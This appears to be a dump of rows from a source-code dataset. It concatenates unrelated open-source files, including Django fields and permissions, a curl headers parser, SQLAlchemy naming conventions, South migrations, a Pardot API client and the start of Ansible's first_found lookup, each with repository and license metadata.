'ibms': {
'handlers': ['console'],
'level': 'INFO'
},
}
}
# Sentry configuration
if env('RAVEN_DSN', False):
RAVEN_CONFIG = {'dsn': env('RAVEN_DSN')}
| apache-2.0 | -416,039,170,357,673,500 | 29.685083 | 92 | 0.618833 | false |
Seegnify/Elasticcrawler | lib/curlheaders.py | 1 | 1702 | """
API to extract bits and pieces from CURL (command line utility) headers file.
The headers can be obtained by calling: curl -D 'headers' 'url'.
Currenlty supported formats are for protocols: HTTP, HTTPS.
"""
class Curlheaders:
# response codes and headers container
reponses = list()
def __init__(self, headers = None):
if headers is not None:
self.load(headers)
def load(self, headers):
# read headers
with open(headers) as f:
lines = [line.strip() for line in f]
# create response list
resps = list()
line_iter = iter(lines)
# consume response code
line = next(line_iter, None)
resp = dict()
resp['code'] = line.split()[1]
resp['head'] = dict()
# iterate over headers
for line in line_iter:
if len(line) is 0:
# append last response
resps.append(resp)
# consume response code
line = next(line_iter, None)
if line is None: break
resp = dict()
resp['code'] = line.split()[1]
resp['head'] = dict()
else:
# consume response header
head = line.find(': ')
name = line[0:head].lower()
val = line[head+2:len(line)]
resp['head'][name] = val
# update loaded reponses
self.responses = resps
def response_count(self):
return len(self.responses)
def http_code(self, response_index):
return self.responses[response_index]['code']
def http_header(self, response_index, header_name):
header_name = header_name.lower()
try:
return self.responses[response_index]['head'][header_name]
except KeyError:
return None
| bsd-3-clause | 1,003,504,171,861,701,200 | 25.59375 | 77 | 0.59342 | false |
raviii/ravii | items/fields.py | 1 | 1881 | from django.db.models.fields.files import ImageField, ImageFieldFile
from PIL import Image
import os
def _add_thumb(s):
"""
Modifies a string (filename, URL) containing an image filename, to insert
'.thumb'
"""
parts = s.split(".")
parts.insert(-1, "thumb")
if parts[-1].lower() not in ['jpeg', 'jpg']:
parts[-1] = 'jpg'
return ".".join(parts)
class ThumbnailImageFieldFile(ImageFieldFile):
def _get_thumb_path(self):
return _add_thumb(self.path)
thumb_path = property(_get_thumb_path)
def _get_thumb_url(self):
return _add_thumb(self.url)
thumb_url = property(_get_thumb_url)
def save(self, name, content, save=True):
super(ThumbnailImageFieldFile, self).save(name, content, save)
img = Image.open(self.path)
img.thumbnail(
(self.field.thumb_width, self.field.thumb_height),
Image.ANTIALIAS
)
img.save(self.thumb_path, 'JPEG')
def delete(self, save=True):
if os.path.exists(self.thumb_path):
os.remove(self.thumb_path)
super(ThumbnailImageFieldFile, self).delete(save)
class ThumbnailImageField(ImageField):
"""
Behaves like a regular ImageField, but stores an extra (JPEG) thumbnail
image, providing FIELD.thumb_url and FIELD.thumb_path.
Accepts two additional, optional arguments: thumb_width and thumb_height,
both defaulting to 128 (pixels). Resizing will preserve aspect ratio while
staying inside the requested dimensions; see PIL's Image.thumbnail()
method documentation for details.
"""
attr_class = ThumbnailImageFieldFile
def __init__(self, thumb_width=128, thumb_height=128, *args, **kwargs):
self.thumb_width = thumb_width
self.thumb_height = thumb_height
super(ThumbnailImageField, self).__init__(*args, **kwargs)
| bsd-3-clause | 6,572,445,099,955,995,000 | 33.2 | 78 | 0.654971 | false |
rdujardin/icforum | icforum/chat/api/permissions.py | 1 | 1257 | # Copyright 2016 Infinite Connection
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from rest_framework import permissions
class RoomPermission(permissions.BasePermission):
"""
Custom permission to allow only members of a room to see it.
"""
def has_object_permission(self, request, view, obj):
return request.user in obj.members.all()
class ChatMessagePermission(permissions.BasePermission):
"""
Custom permission to allow only members of a room to post in it and allow only authors to edit their messages.
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return request.user in obj.room.members.all()
return obj.author == request.user and request.user in obj.room.members.all()
| apache-2.0 | 5,509,194,607,901,554,000 | 35.970588 | 111 | 0.762928 | false |
trec-kba/streamcorpus-pipeline | streamcorpus_pipeline/tests/test_language.py | 1 | 1657 | '''tests for langauge detection transform
.. This software is released under an MIT/X11 open source license.
Copyright 2012-2015 Diffeo, Inc.
'''
from __future__ import absolute_import
import os
import pytest
import streamcorpus_pipeline
from streamcorpus_pipeline._clean_html import clean_html
from streamcorpus_pipeline._language import language
from streamcorpus import make_stream_item, ContentItem
@pytest.mark.skipif(True, reason='no longer used')
def test_langauge(test_data_dir):
path = os.path.join(test_data_dir, 'test/raw-unicode-issues.html')
si = make_stream_item(None, 'test')
si.body = ContentItem(raw=open(path).read())
context = {}
lang = language(config={})
lang(si, context)
assert si.body.language.name == 'Japanese'
assert si.body.language.code == 'ja'
@pytest.mark.skipif(True, reason='no longer used')
@pytest.mark.parametrize('with_clean_html', [(True,), (False,)])
def test_language_unreliable_on_raw(test_data_dir, with_clean_html):
path = os.path.join(test_data_dir, 'test/unreliable-language-detect-on-raw.html')
si = make_stream_item(None, 'http://bbs.sjtu.edu.cn/bbsanc?path=%2Fgroups%2FGROUP_0%2Fmessage%2FD4EFC2634%2FD7AC8E3A8%2FG.1092960050.A')
raw = open(path).read()
#raw = raw.decode('GB2312', 'ignore').encode('utf8')
si.body = ContentItem(raw=raw)
si.body.encoding = 'GB2312'
si.body.media_type = 'text/html'
context = {}
if with_clean_html:
ch = clean_html(config={})
ch(si, context)
lang = language(config={})
lang(si, context)
assert si.body.language.name == 'Chinese'
assert si.body.language.code == 'zh'
| mit | -3,371,838,387,927,223,000 | 35.021739 | 140 | 0.694629 | false |
MechanisM/musicdb | musicdb/common/management/commands/initial_import_fixups.py | 1 | 3570 | from django.core.management.base import NoArgsCommand
from musicdb.classical.models import *
class Command(NoArgsCommand):
def handle_noargs(self, **options):
work_pairs = (
('felix-mendelssohn', ('string-quartet-in-e-flat', 'string-quartet-in-e-flat-1')),
('ludvig-van-beethoven', ('piano-trio-in-e-flat-triosatz', 'piano-trio-in-e-flat-triosatz-1')),
('fryderyk-chopin', ('ballade-no-4-op-52-in-f-minor', 'ballade-no-4-op-52-in-f-minor-1')),
)
for a, (b, c) in work_pairs:
try:
Work.objects.get(composer__slug=a, slug=b).merge_from(
Work.objects.get(composer__slug=a, slug=c)
)
except Work.DoesNotExist:
print "W: Skipping", a, b, c
ensemble_pairs = (
('chamber-orchestra-of-europe', 'chamber-orchestra-of-europe-1'),
('orquestra-sinfonica-haydn-de-bolzano-e-trento', 'orquestra-sinfonica-haydn-de-bolzano-e-trento-1'),
('i-solisti-veneti', 'i-solisti-veneti-1'),
('london-symphony-orchestra', 'london-symphony-orchestra-principals'),
('vienna-philharmonic-orchestra', 'wiener-philharmoniker'),
)
for a, b in ensemble_pairs:
try:
Ensemble.objects.get(slug=a).merge_from(Ensemble.objects.get(slug=b))
except Ensemble.DoesNotExist:
print "W: Skipping", a, b
relationships = {
'arrangement': (
('orchesographie', 'capriol-suite-for-string-orchestra'),
),
'revision': (
('brandenburg-concerto-no-5-early-version-bwv-1050a-in-d', 'brandenburg-concerto-no-5-bwv-1050-in-d'),
('brandenburg-concerto-no-1-early-version-bwv-1046a-in-f', 'brandenburg-concerto-no-1-bwv-1046-in-f'),
),
'variations': (
('twelve-variations-on-ah-vous-dirai-je-maman-k-265-in-c', 'romantic-piece-op-18'),
),
'transcription': (
('brandenburg-concerto-no-4-bwv-1049-in-g', 'concerto-for-harpsichord-and-two-recorders-transcription-of-brandenburg-concerto-no-4-bwv-1057'),
('violin-concerto-bwv-1041-in-a-minor', 'harpsichord-concerto-bwv-1058r-in-g-minor'),
('violin-concerto-bwv-1042-in-e', 'harpsichord-concerto-bwv-1054-in-d'),
('concerto-for-oboe-and-violin-bwv-1060r-in-g-minor', 'concerto-for-two-harpsichords-bwv-1060-in-c-minor'),
('double-violin-concerto-bwv-1043-in-d-minor', 'concerto-for-two-harpsichords-bwv-1062-in-c-minor'),
('concerto-for-three-violins-bwv-1064r-in-d', 'concerto-for-three-harpsichords-bwv-1064-in-c'),
('concerto-for-four-violins-op-3-no-10-rv-580-in-b-minor', 'concerto-for-three-harpsichords-bwv-1064-in-c'),
('concerto-for-oboe-damore-bwv-1055r-in-a', 'harpsichord-concerto-bwv-1055-in-a'),
)
}
for nature, data in relationships.items():
for x, y in data:
WorkRelationship.objects.create(
source=Work.objects.get(slug=x),
derived=Work.objects.get(slug=y),
nature=nature,
)
to_delete = ()
for klass, pks in to_delete:
for pk in pks:
try:
klass.objects.get(pk=pk).delete()
except klass.DoesNotExist:
print "W: Skipping deletion of", klass, pk
| agpl-3.0 | 4,716,751,957,606,330,000 | 47.243243 | 158 | 0.564986 | false |
lgiordani/punch | tests/script/test_complex_serializers.py | 1 | 2035 | import pytest
pytestmark = pytest.mark.slow
version_file_content = """
major = 1
minor = 0
patch = 0
"""
config_file_content = """
__config_version__ = 1
GLOBALS = {
'serializer': {
'semver': {
'search': 'Next Release',
'replace': '{{major}}.{{minor}}.{{patch}}'
}
},
}
FILES = ["CHANGELOG.rst"]
VERSION = ['major', 'minor', 'patch']
"""
config_file_content_dedicated_serializer = """
__config_version__ = 1
GLOBALS = {
'serializer': '{{major}}.{{minor}}.{{patch}}',
}
FILES = [
{
'path': "CHANGELOG.rst",
'serializer': {
'semver': {
'search': 'Next Release',
'replace': '{{major}}.{{minor}}.{{patch}}'
},
}
}
]
VERSION = ['major', 'minor', 'patch']
"""
changelog = """
Changelog
=========
Next Release
------------
**Added**
* Added some new feature
"""
expected_changelog = """
Changelog
=========
2.0.0
------------
**Added**
* Added some new feature
"""
def test_complex_serializer(test_environment):
test_environment.ensure_file_is_present("CHANGELOG.rst", changelog)
test_environment.ensure_file_is_present(
"punch_version.py",
version_file_content
)
test_environment.ensure_file_is_present(
"punch_config.py",
config_file_content
)
test_environment.call(["punch", "--part", "major"])
assert test_environment.get_file_content("CHANGELOG.rst") == \
expected_changelog
def test_complex_serializer_dedicated_serializers(test_environment):
test_environment.ensure_file_is_present("CHANGELOG.rst", changelog)
test_environment.ensure_file_is_present(
"punch_version.py",
version_file_content
)
test_environment.ensure_file_is_present(
"punch_config.py",
config_file_content_dedicated_serializer
)
test_environment.call(["punch", "--part", "major"])
assert test_environment.get_file_content("CHANGELOG.rst") == \
expected_changelog
| isc | 8,717,487,821,526,093,000 | 17.842593 | 71 | 0.57543 | false |
michaelBenin/sqlalchemy | lib/sqlalchemy/sql/naming.py | 1 | 5728 | # sqlalchemy/naming.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Establish constraint and index naming conventions.
"""
from .schema import Constraint, ForeignKeyConstraint, PrimaryKeyConstraint, \
UniqueConstraint, CheckConstraint, Index, Table, Column
from .. import event, events
from .. import exc
from .elements import _truncated_label
import re
class conv(_truncated_label):
"""Mark a string indicating that a name has already been converted
by a naming convention.
This is a string subclass that indicates a name that should not be
subject to any further naming conventions.
E.g. when we create a :class:`.Constraint` using a naming convention
as follows::
m = MetaData(naming_convention={"ck": "ck_%(table_name)s_%(constraint_name)s"})
t = Table('t', m, Column('x', Integer),
CheckConstraint('x > 5', name='x5'))
The name of the above constraint will be rendered as ``"ck_t_x5"``. That is,
the existing name ``x5`` is used in the naming convention as the ``constraint_name``
token.
In some situations, such as in migration scripts, we may be rendering
the above :class:`.CheckConstraint` with a name that's already been
converted. In order to make sure the name isn't double-modified, the
new name is applied using the :func:`.schema.conv` marker. We can
use this explicitly as follows::
m = MetaData(naming_convention={"ck": "ck_%(table_name)s_%(constraint_name)s"})
t = Table('t', m, Column('x', Integer),
CheckConstraint('x > 5', name=conv('ck_t_x5')))
Where above, the :func:`.schema.conv` marker indicates that the constraint
name here is final, and the name will render as ``"ck_t_x5"`` and not
``"ck_t_ck_t_x5"``
.. versionadded:: 0.9.4
.. seealso::
:ref:`constraint_naming_conventions`
"""
class ConventionDict(object):
def __init__(self, const, table, convention):
self.const = const
self._is_fk = isinstance(const, ForeignKeyConstraint)
self.table = table
self.convention = convention
self._const_name = const.name
def _key_table_name(self):
return self.table.name
def _column_X(self, idx):
if self._is_fk:
fk = self.const.elements[idx]
return fk.parent
else:
return list(self.const.columns)[idx]
def _key_constraint_name(self):
if not self._const_name:
raise exc.InvalidRequestError(
"Naming convention including "
"%(constraint_name)s token requires that "
"constraint is explicitly named."
)
if not isinstance(self._const_name, conv):
self.const.name = None
return self._const_name
def _key_column_X_name(self, idx):
return self._column_X(idx).name
def _key_column_X_label(self, idx):
return self._column_X(idx)._label
def _key_referred_table_name(self):
fk = self.const.elements[0]
refs = fk.target_fullname.split(".")
if len(refs) == 3:
refschema, reftable, refcol = refs
else:
reftable, refcol = refs
return reftable
def _key_referred_column_X_name(self, idx):
fk = self.const.elements[idx]
refs = fk.target_fullname.split(".")
if len(refs) == 3:
refschema, reftable, refcol = refs
else:
reftable, refcol = refs
return refcol
def __getitem__(self, key):
if key in self.convention:
return self.convention[key](self.const, self.table)
elif hasattr(self, '_key_%s' % key):
return getattr(self, '_key_%s' % key)()
else:
col_template = re.match(r".*_?column_(\d+)_.+", key)
if col_template:
idx = col_template.group(1)
attr = "_key_" + key.replace(idx, "X")
idx = int(idx)
if hasattr(self, attr):
return getattr(self, attr)(idx)
raise KeyError(key)
_prefix_dict = {
Index: "ix",
PrimaryKeyConstraint: "pk",
CheckConstraint: "ck",
UniqueConstraint: "uq",
ForeignKeyConstraint: "fk"
}
def _get_convention(dict_, key):
for super_ in key.__mro__:
if super_ in _prefix_dict and _prefix_dict[super_] in dict_:
return dict_[_prefix_dict[super_]]
elif super_ in dict_:
return dict_[super_]
else:
return None
@event.listens_for(Constraint, "after_parent_attach")
@event.listens_for(Index, "after_parent_attach")
def _constraint_name(const, table):
if isinstance(table, Column):
# for column-attached constraint, set another event
# to link the column attached to the table as this constraint
# associated with the table.
event.listen(table, "after_parent_attach",
lambda col, table: _constraint_name(const, table)
)
elif isinstance(table, Table):
metadata = table.metadata
convention = _get_convention(metadata.naming_convention, type(const))
if convention is not None:
if const.name is None or "constraint_name" in convention:
newname = conv(
convention % ConventionDict(const, table, metadata.naming_convention)
)
if const.name is None:
const.name = newname
| mit | -7,769,484,997,395,845,000 | 33.506024 | 97 | 0.597416 | false |
fanglinfang/myuw | myuw/migrations/0002_auto__add_unique_usernotices_notice_hash_user__add_field_categorylinks.py | 1 | 6154 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Eh, I'm not so worried about tracking user notices that this is a problem
db.clear_table(u'myuw_mobile_usernotices')
# Adding unique constraint on 'UserNotices', fields ['notice_hash', 'user']
db.create_unique(u'myuw_mobile_usernotices', ['notice_hash', 'user_id'])
# Adding field 'CategoryLinks.new_tab'
db.add_column(u'myuw_mobile_categorylinks', 'new_tab',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Removing unique constraint on 'UserNotices', fields ['notice_hash', 'user']
db.delete_unique(u'myuw_mobile_usernotices', ['notice_hash', 'user_id'])
# Deleting field 'CategoryLinks.new_tab'
db.delete_column(u'myuw_mobile_categorylinks', 'new_tab')
models = {
u'myuw.building': {
'Meta': {'object_name': 'Building'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '6', 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latititude': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'longitude': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'myuw.categorylinks': {
'Meta': {'object_name': 'CategoryLinks'},
'campus': ('django.db.models.fields.CharField', [], {'max_length': '8', 'null': 'True'}),
'category_id': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'category_name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_tab': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sub_category': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '150'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '150'})
},
u'myuw.coursecolor': {
'Meta': {'object_name': 'CourseColor'},
'color_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'course_number': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'curriculum_abbr': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {}),
'quarter': ('django.db.models.fields.CharField', [], {'max_length': '10', 'db_index': 'True'}),
'regid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'section_id': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.PositiveSmallIntegerField', [], {'db_index': 'True'})
},
u'myuw.studentaccountsbalances': {
'Meta': {'object_name': 'StudentAccountsBalances'},
'asof_datetime': ('django.db.models.fields.DateTimeField', [], {}),
'employee_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '10', 'null': 'True', 'blank': 'True'}),
'husky_card': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '6', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_am': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'residence_hall_dining': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '7', 'decimal_places': '2', 'blank': 'True'}),
'student_number': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10', 'db_index': 'True'})
},
u'myuw.tuitiondate': {
'Meta': {'object_name': 'TuitionDate'},
'date': ('django.db.models.fields.DateField', [], {}),
'date_stored': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['myuw.User']", 'unique': 'True', 'on_delete': 'models.PROTECT'})
},
u'myuw.user': {
'Meta': {'object_name': 'User'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_visit': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 9, 15, 0, 0)'}),
'uwnetid': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '16'}),
'uwregid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True', 'db_index': 'True'})
},
u'myuw.usernotices': {
'Meta': {'unique_together': "(('notice_hash', 'user'),)", 'object_name': 'UserNotices'},
'first_viewed': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_read': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'marked_read': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'notice_hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['myuw.User']", 'on_delete': 'models.PROTECT'})
}
}
complete_apps = ['myuw']
| apache-2.0 | 4,205,599,867,594,422,300 | 62.443299 | 159 | 0.553136 | false |
jn2840/bitcoin | share/qt/extract_strings_qt.py | 1 | 1875 | #!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
import os
import sys
OUT_CPP="qt/bitcoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
files = sys.argv[1:]
# xgettext -n --keyword=_ $FILES
XGETTEXT=os.getenv('XGETTEXT', 'xgettext')
child = Popen([XGETTEXT,'--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""
#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *bitcoin_strings[] = {\n')
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("beardcoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};\n')
f.close()
| mit | 1,085,203,892,940,296,700 | 23.038462 | 82 | 0.578667 | false |
anthonyfok/frescobaldi | frescobaldi_app/logtool/__init__.py | 1 | 3820 | # This file is part of the Frescobaldi project, http://www.frescobaldi.org/
#
# Copyright (c) 2008 - 2014 by Wilbert Berendsen
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# See http://www.gnu.org/licenses/ for more information.
"""
The log dockwindow.
"""
from PyQt5.QtCore import QSettings, Qt
from PyQt5.QtGui import QKeySequence
from PyQt5.QtWidgets import QAction
import actioncollection
import actioncollectionmanager
import app
import panel
class LogTool(panel.Panel):
"""A dockwidget showing the log of running Jobs."""
def __init__(self, mainwindow):
super(LogTool, self).__init__(mainwindow)
self.hide()
self.toggleViewAction().setShortcut(QKeySequence("Meta+Alt+L"))
ac = self.actionCollection = Actions()
ac.log_next_error.triggered.connect(self.slotNextError)
ac.log_previous_error.triggered.connect(self.slotPreviousError)
actioncollectionmanager.manager(mainwindow).addActionCollection(ac)
mainwindow.addDockWidget(Qt.BottomDockWidgetArea, self)
app.jobStarted.connect(self.slotJobStarted)
app.jobFinished.connect(self.slotJobFinished)
def translateUI(self):
self.setWindowTitle(_("LilyPond Log"))
self.toggleViewAction().setText(_("LilyPond &Log"))
def createWidget(self):
from . import logwidget
return logwidget.LogWidget(self)
def slotJobStarted(self, doc, job):
"""Called whenever job starts, decides whether to follow it and show the log."""
import jobattributes
jattrs = jobattributes.get(job)
if doc == self.mainwindow().currentDocument() or self.mainwindow() == jattrs.mainwindow:
self.widget().switchDocument(doc)
if not jattrs.hidden and QSettings().value("log/show_on_start", True, bool):
self.show()
def slotJobFinished(self, document, job, success):
import jobattributes
if (not success and not job.is_aborted()
and not jobattributes.get(job).hidden
and document == self.mainwindow().currentDocument()):
self.show()
def slotNextError(self):
"""Jumps to the position pointed to by the next error message."""
self.activate()
self.widget().gotoError(1)
def slotPreviousError(self):
"""Jumps to the position pointed to by the next error message."""
self.activate()
self.widget().gotoError(-1)
class Actions(actioncollection.ActionCollection):
name = "logtool"
def createActions(self, parent=None):
self.log_next_error = QAction(parent)
self.log_previous_error = QAction(parent)
self.log_next_error.setShortcut(QKeySequence("Ctrl+E"))
self.log_previous_error.setShortcut(QKeySequence("Ctrl+Shift+E"))
def translateUI(self):
self.log_next_error.setText(_("Next Error Message"))
self.log_previous_error.setText(_("Previous Error Message"))
# log errors by initializing Errors instance
@app.jobStarted.connect
def _log_errors(document):
from . import errors
errors.errors(document)
| gpl-2.0 | -6,433,061,246,334,416,000 | 36.087379 | 96 | 0.685079 | false |
joshgeller/PyPardot | pypardot/objects/opportunities.py | 1 | 3806 | class Opportunities(object):
"""
A class to query and use Pardot opportunities.
Opportunity field reference: http://developer.pardot.com/kb/api-version-3/object-field-references/#opportunity
"""
def __init__(self, client):
self.client = client
def query(self, **kwargs):
"""
Returns the opportunities matching the specified criteria parameters.
Supported search criteria: http://developer.pardot.com/kb/api-version-3/opportunities/#supported-search-criteria
"""
response = self._get(path='/do/query', params=kwargs)
# Ensure result['opportunity'] is a list, no matter what.
result = response.get('result')
if result['total_results'] == 0:
result['opportunity'] = []
elif result['total_results'] == 1:
result['opportunity'] = [result['opportunity']]
return result
def create_by_email(self, prospect_email=None, name=None, value=None, probability=None, **kwargs):
"""
Creates a new opportunity using the specified data. <prospect_email> must correspond to an existing prospect.
"""
kwargs.update({'name': name, 'value': value, 'probability': probability})
response = self._post(
path='/do/create/prospect_email/{prospect_email}'.format(prospect_email=prospect_email),
params=kwargs)
return response
def create_by_id(self, prospect_id=None, name=None, value=None, probability=None, **kwargs):
"""
Creates a new opportunity using the specified data. <prospect_id> must correspond to an existing prospect.
"""
kwargs.update({'name': name, 'value': value, 'probability': probability})
response = self._post(
path='/do/create/prospect_id/{prospect_id}'.format(prospect_id=prospect_id),
params=kwargs)
return response
def read(self, id=None):
"""
Returns the data for the opportunity specified by <id>, including campaign assignment and associated visitor
activities. <id> is the Pardot ID for the target opportunity.
"""
response = self._post(path='/do/read/id/{id}'.format(id=id))
return response
def update(self, id=None):
"""
Updates the provided data for the opportunity specified by <id>. <id> is the Pardot ID for the target
opportunity. Fields that are not updated by the request remain unchanged. Returns an updated version of the
opportunity.
"""
response = self._post(path='/do/update/id/{id}'.format(id=id))
return response
def delete(self, id=None):
"""
Deletes the opportunity specified by <id>. <id> is the Pardot ID for the target opportunity. Returns no response
on success.
"""
response = self._post(path='/do/delete/id/{id}'.format(id=id))
return response
def undelete(self, id=None):
"""
Un-deletes the opportunity specified by <id>. <id> is the Pardot ID for the target opportunity. Returns no
response on success.
"""
response = self._post(path='/do/undelete/id/{id}'.format(id=id))
return response
def _get(self, object_name='opportunity', path=None, params=None):
"""GET requests for the Opportunity object."""
if params is None:
params = {}
response = self.client.get(object_name=object_name, path=path, params=params)
return response
def _post(self, object_name='opportunity', path=None, params=None):
"""POST requests for the Opportunity object."""
if params is None:
params = {}
response = self.client.post(object_name=object_name, path=path, params=params)
return response
| mit | -5,657,057,192,978,973,000 | 40.824176 | 120 | 0.625854 | false |
dmsimard/ansible | lib/ansible/plugins/lookup/first_found.py | 1 | 7109 | # (c) 2013, seth vidal <[email protected]> red hat, inc
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
name: first_found
author: Seth Vidal (!UNKNOWN) <[email protected]>
version_added: historical
short_description: return first file found from list
description:
- this lookup checks a list of files and paths and returns the full path to the first combination found.
- As all lookups, when fed relative paths it will try use the current task's location first and go up the chain
to the containing role/play/include/etc's location.
- The list of files has precedence over the paths searched.
i.e, A task in a role has a 'file1' in the play's relative path, this will be used, 'file2' in role's relative path will not.
- Either a list of files C(_terms) or a key `files` with a list of files is required for this plugin to operate.
notes:
- This lookup can be used in 'dual mode', either passing a list of file names or a dictionary that has C(files) and C(paths).
options:
_terms:
description: list of file names
files:
description: list of file names
type: list
default: []
paths:
description: list of paths in which to look for the files
type: list
default: []
skip:
type: boolean
default: False
description: Return an empty list if no file is found, instead of an error.
"""
EXAMPLES = """
- name: show first existing file or ignore if none do
debug: msg={{lookup('first_found', findme, errors='ignore')}}
vars:
findme:
- "/path/to/foo.txt"
- "bar.txt" # will be looked in files/ dir relative to role and/or play
- "/path/to/biz.txt"
- name: |
include tasks only if files exist. Note the use of query() to return
a blank list for the loop if no files are found.
import_tasks: '{{ item }}'
vars:
params:
files:
- path/tasks.yaml
- path/other_tasks.yaml
loop: "{{ query('first_found', params, errors='ignore') }}"
- name: |
copy first existing file found to /some/file,
looking in relative directories from where the task is defined and
including any play objects that contain it
copy: src={{lookup('first_found', findme)}} dest=/some/file
vars:
findme:
- foo
- "{{inventory_hostname}}"
- bar
- name: same copy but specific paths
copy: src={{lookup('first_found', params)}} dest=/some/file
vars:
params:
files:
- foo
- "{{inventory_hostname}}"
- bar
paths:
- /tmp/production
- /tmp/staging
- name: INTERFACES | Create Ansible header for /etc/network/interfaces
template:
src: "{{ lookup('first_found', findme)}}"
dest: "/etc/foo.conf"
vars:
findme:
- "{{ ansible_virtualization_type }}_foo.conf"
- "default_foo.conf"
- name: read vars from first file found, use 'vars/' relative subdir
include_vars: "{{lookup('first_found', params)}}"
vars:
params:
files:
- '{{ansible_distribution}}.yml'
- '{{ansible_os_family}}.yml'
- default.yml
paths:
- 'vars'
"""
RETURN = """
_raw:
description:
- path to file found
type: list
elements: path
"""
import os
from jinja2.exceptions import UndefinedError
from ansible.errors import AnsibleLookupError, AnsibleUndefinedVariable
from ansible.module_utils.common._collections_compat import Mapping, Sequence
from ansible.module_utils.six import string_types
from ansible.plugins.lookup import LookupBase
def _split_on(terms, spliters=','):
# TODO: fix as it does not allow spaces in names
termlist = []
if isinstance(terms, string_types):
for spliter in spliters:
terms = terms.replace(spliter, ' ')
termlist = terms.split(' ')
else:
# added since options will already listify
for t in terms:
termlist.extend(_split_on(t, spliters))
return termlist
class LookupModule(LookupBase):
def _process_terms(self, terms, variables, kwargs):
total_search = []
skip = False
